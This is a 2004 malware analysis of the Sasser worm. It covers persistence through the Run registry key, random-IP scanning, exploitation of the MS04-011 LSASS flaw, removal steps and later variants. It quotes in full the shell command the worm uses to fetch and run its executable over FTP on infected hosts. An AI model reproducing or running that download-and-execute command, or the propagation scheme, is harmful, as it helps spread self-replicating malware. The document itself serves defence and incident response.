Sasser Worm Analysis

• URL: http://www.secureworks.com/research/threats/sasser
• Date: May 1, 2004
• Author: Joe Stewart

Summary

A new worm called "Sasser" has been found spreading in the wild.

Analysis

The worm utilizes the MS04-011 LSASS exploit released by "houseofdabus" on Thursday April 29 2004. The worm executable was compiled on Friday April 30 2004 at 19:23:16 (timezone unknown).

When executed, the worm:

• Installs itself to %WINDIR% as avserve.exe
• Adds the following registry key:

        HKLM\Software\Microsoft\Windows\CurrentVersion\Run
                avserve.exe -> C:\%WINDIR%\avserve.exe

• Creates a Mutex "Jobaka31" to ensure only one copy of the worm runs in memory
• Spawns a mini-FTP server on TCP port 5554 to deliver the worm executable to exploited systems
• Spawns 128 threads to scan for and exploit vulnerable systems
• Calls API method AbortSystemShutdown to prevent the system from rebooting
• Sleeps for 3 seconds then loops back to the AbortSystemShutdown call

The scanner threads work as described below:

• The thread attempts to determine the local machine's IP address. It loops through every address returned by gethostbyname for the local hostname. If it finds a publicly routable Internet address (non-RFC1918) it will use that address. If none are found it will use any private subnet address (RFC1918 or 127.0.0.1) it finds. If no address is returned it will use 127.0.0.1
• A target IP to exploit to is generated:
• 50% of the time it will attempt to exploit a completely random IP address
• 25% of the time it will attempt to exploit a random address within the same first octet of the local subnet
• 25% of the time it will attempt to exploit a random address within the same first and second octets of the local subnet
• If successful, the LSASS exploit will open a shell on the remote system on TCP port 9996. The worm will connect to this port and attempt to send the following commands:
• echo off&echo open [infecting machine's IP] 5554>>cmd.ftp&echo anonymous>>cmd.ftp&echo user&echo bin>>cmd.ftp&echo get [rand]_up.exe>>cmd.ftp&echo bye>>cmd.ftp&echo on&ftp -s:cmd.ftp&[rand]i_up.exe&echo off&del cmd.ftp&echo on
• This will copy the worm executable to the target machine, where it will run and begin to spread
• The thread sleeps for 250 milliseconds, then repeats the entire process

Removal

Use the task manager to kill the avserve.exe process, then delete the HKLM\Software\Microsoft\Windows\CurrentVersion\Run\avserve.exe registry key. It may not be possible to run Windows Update to install the patch before the machine is compromised again, similar to what Windows users experienced with the Blaster worm. Block TCP port 445 then patch the system for MS04-011, or download and install the patches from a CDROM while offline.

More detailed removal instructions are available from Microsoft at http://www.microsoft.com/security/incident/sasser.asp

Update: May 11, 2004

The authors of the Netsky virus have claimed authorship of Sasser in comments included in the code of Netsky.AC. They provide a snippet of source code as proof. SecureWorks has also independently compared the binary code of both Sasser and Netsky and found other evidence supporting a common source code base in the two programs. Therefore the claim of "Team Skynet" appears to be credible.

Like Netsky, new variants of Sasser are being released quickly. As of this writing, six variants have been uncovered:

Differences between variant A and B were changes to the code to implement a pseudo-forking mechanism when exploiting hosts. Variant C changed the number of scanning threads to 1024 instead of 128. Variant D changed the number of scanning threads back to 128 and implemented a ICMPSendEcho API call prior to connecting to a host via TCP in order to speed up scanning (much in the same way the Welchia worm does). Due to a bug, the D variant does not appear to run on Windows 2000. The E variant changes the shell and FTP ports to 1022 and 1023 respectively, and pops up a message box at certain intervals letting the user know they are vulnerable to MS04-011. It also attempts to kill certain Bagle variants if they are running on the same system. The E variant has the same bug as the D variant and does not appear to run on Windows 2000. The F variant is a repack of the A variant binary with the mutex and exe/registry entry strings edited using a hexeditor. It is a copycat re-release similar to what we witnessed following the Blaster worm.